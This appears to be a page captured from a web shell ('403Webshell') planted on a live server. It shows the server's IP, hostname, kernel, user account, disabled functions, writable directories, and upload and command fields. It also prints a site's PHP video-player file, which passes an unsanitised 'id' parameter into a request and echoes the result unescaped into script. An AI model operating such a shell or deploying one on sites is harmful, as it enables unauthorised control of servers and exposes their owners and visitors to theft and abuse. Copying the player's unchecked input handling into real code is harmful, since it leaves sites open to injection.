403Webshell
Server IP : 108.170.25.35  /  Your IP : 18.223.209.218
Web Server : Apache/2
System : Linux gains.winzonesoftech.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : softechwinzone ( 1579)
PHP Version : 8.1.28
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/softechwinzone/public_html/images/gogoanime/player/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/softechwinzone/public_html/images/gogoanime/player/player1.php
<?php
require('../php/info.php');

$id = $_GET['id'];

$json = file_get_contents("$apiLink/vidcdn/watch/$id");
$video = json_decode($json, true);

if (isset($video['sources']) && !empty($video['sources'])) {
    $highest_quality_index = count($video['sources']) - 1;
    $m3u8_url = $video['sources'][$highest_quality_index]['file'];
} else {
    echo "Error: M3U8 URL not found in API response";
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Video Player</title>
    <!-- Include VidStack player styles -->
    <link rel="stylesheet" href="https://cdn.vidstack.io/player/theme.css">
    <link rel="stylesheet" href="https://cdn.vidstack.io/player/video.css">
</head>
<body>
    <!-- Player container -->
    <div id="playerContainer"></div>

    <!-- Include VidStack player script -->
    <script type="module">
        import { VidstackPlayer, VidstackPlayerLayout } from 'https://cdn.vidstack.io/player';

        async function createPlayer() {
            const player = await VidstackPlayer.create({
                target: '#playerContainer',
                title: 'Title',
                src: '<?php echo $m3u8_url; ?>',
                // Optional: Add a poster image
                poster: 'anime.jpg',
                layout: new VidstackPlayerLayout({
                    // Optional: Add thumbnails
                    thumbnails: 'https://example.com/thumbnails.vtt'
                })
            });
        }

        createPlayer();
    </script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit